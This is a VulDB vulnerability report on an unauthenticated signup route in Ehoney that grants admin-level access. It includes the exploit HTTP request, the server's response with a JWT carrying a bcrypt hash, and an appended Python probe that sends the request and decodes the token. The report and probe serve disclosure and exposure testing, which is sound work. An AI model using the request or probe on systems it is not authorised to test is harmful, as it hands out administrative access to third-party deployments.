Submit #49967: Ehoney <= v3.0.0 unpublished signup api via /api/public/signup

Title: Ehoney <= v3.0.0 unpublished signup api via /api/public/signup

Description:

## description

In Ehoney <= v3.0.0, there is an unpublished registered route. Any user can register an account through this API and log in. Since there is no permission division, this user has the same management permissions as admin.

## request

```
POST /api/public/signup HTTP/1.1
Content-Length: 40
Content-Type: application/json
Host: x.x.x.x:8080

{
  "username": "a",
  "password": "a"
}
```

## response

```json
{
  "code": 200,
  "msg": "ok",
  "data": {
    "name": "a",
    "token": "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6ImEiLCJwYXNzd29yZCI6IiQyYSQxNCRINmVmQ0xLbFhRRnl3QXF6V0NGalB1bGhPLlU3MTlYRnhLZ1ZRN01OMTlUamhqZWo5bWcwVyIsImV4cCI6MTY2Njc3MjU4NiwiaXNzIjoiZ2luLWJsb2cifQ.GVpPi4PxprCAIiAMI7R_fko2g_9C-F9kVTFb_EbKWqo"
  }
}
```

## affected code

https://github.com/seccome/Ehoney/blob/aba3197bd2fe9f16e9cf4e20c1a7df4a1608c5a7/controllers/user_handler/uesr.go#L51
User: Anonymous User
Submission: 28.10.2022 03:54 (3 years ago)
Moderation: 28.10.2022 07:42 (4 hours later)
Status: Accepted
VulDB Entry: 212417 [seccome Ehoney /api/public/signup privilege escalation]
Points: 17
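A small probe for the behaviour the submission describes, added here as an example; it is not code from the Ehoney project or from the submitter. It sends the signup request quoted above and, if the server answers with a token, decodes the JWT header and payload without verifying the signature so you can see which claims the server embedded (the quoted token carries the account's bcrypt hash in its payload). The target base URL, username and password are assumed placeholders; the sample response embedded in the script is the one quoted in the report, so the assessment logic runs offline. The script does not check whether the new account really has admin rights, because the report names no admin endpoint to test against.

```python
"""Probe for an unauthenticated signup route of the kind described in the report.

Added example: this is NOT code from the Ehoney project or from the VulDB
submission. Assumed placeholders: the target base URL, the username and the
password passed to probe(). The sample response embedded below is the one
quoted in the report, kept here so the assessment logic runs offline.
"""
import base64
import json
import urllib.request
from urllib.error import HTTPError, URLError

SIGNUP_PATH = "/api/public/signup"  # route named in the report


def build_signup_request(base_url, username, password):
    """Build the POST /api/public/signup request shown in the report."""
    body = json.dumps({"username": username, "password": password}).encode("utf-8")
    return urllib.request.Request(
        base_url.rstrip("/") + SIGNUP_PATH,
        data=body,
        headers={"Content-Type": "application/json"},
        method="POST",
    )


def decode_jwt_unverified(token):
    """Return (header, payload) of a compact JWS WITHOUT checking the signature.

    Only useful for inspection: never trust claims obtained this way.
    """
    parts = token.split(".")
    if len(parts) != 3:
        raise ValueError("not a compact JWS (expected header.payload.signature)")

    def b64url_decode(segment):
        # JWT segments drop base64url padding; restore it before decoding.
        return base64.urlsafe_b64decode(segment + "=" * (-len(segment) % 4))

    header = json.loads(b64url_decode(parts[0]))
    payload = json.loads(b64url_decode(parts[1]))
    return header, payload


def assess_signup_response(body):
    """Classify a signup response body (str or bytes) in the report's format.

    Returns a dict: whether signup succeeded (code 200 plus a token), which
    claims the token carries, and whether a bcrypt hash is embedded in it.
    """
    data = json.loads(body)
    finding = {"signup_succeeded": False, "token_claims": [], "hash_in_token": False}
    payload_data = data.get("data")
    token = payload_data.get("token") if isinstance(payload_data, dict) else None
    if data.get("code") == 200 and token:
        finding["signup_succeeded"] = True
        _, claims = decode_jwt_unverified(token)
        finding["token_claims"] = sorted(claims)
        pw = claims.get("password")
        # bcrypt hashes start with $2a$, $2b$ or $2y$
        finding["hash_in_token"] = isinstance(pw, str) and pw.startswith(("$2a$", "$2b$", "$2y$"))
    return finding


def probe(base_url, username, password, timeout=10):
    """Send the signup request to a live target and assess the answer.

    A 4xx/5xx answer is reported with its status instead of raising, since a
    404 here simply means the route is not exposed.
    """
    req = build_signup_request(base_url, username, password)
    try:
        with urllib.request.urlopen(req, timeout=timeout) as resp:
            return assess_signup_response(resp.read())
    except HTTPError as exc:
        return {"signup_succeeded": False, "http_status": exc.code}
    except URLError as exc:
        return {"signup_succeeded": False, "error": str(exc.reason)}


# Constructed sample: the response body quoted in the report above.
SAMPLE_TOKEN = (
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJ1c2VybmFtZSI6ImEiLCJwYXNzd29yZCI6IiQyYSQxNCRINmVmQ0xLbFhRRnl3QXF6V0NGalB1bGhPLlU3MTlYRnhLZ1ZRN01OMTlUamhqZWo5bWcwVyIsImV4cCI6MTY2Njc3MjU4NiwiaXNzIjoiZ2luLWJsb2cifQ."
    "GVpPi4PxprCAIiAMI7R_fko2g_9C-F9kVTFb_EbKWqo"
)
SAMPLE_RESPONSE = json.dumps(
    {"code": 200, "msg": "ok", "data": {"name": "a", "token": SAMPLE_TOKEN}}
)

if __name__ == "__main__":
    # Offline run against the quoted response; for a live target use
    # probe("http://x.x.x.x:8080", "a", "a") instead.
    print(json.dumps(assess_signup_response(SAMPLE_RESPONSE), indent=2))
```

Run it with no arguments to see the assessment of the quoted response; point `probe()` at a test instance to check a deployment. A result with `signup_succeeded` true on a host where no self-registration is expected is the finding; `hash_in_token` true additionally means the server is handing the account's password hash to anyone holding the token.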
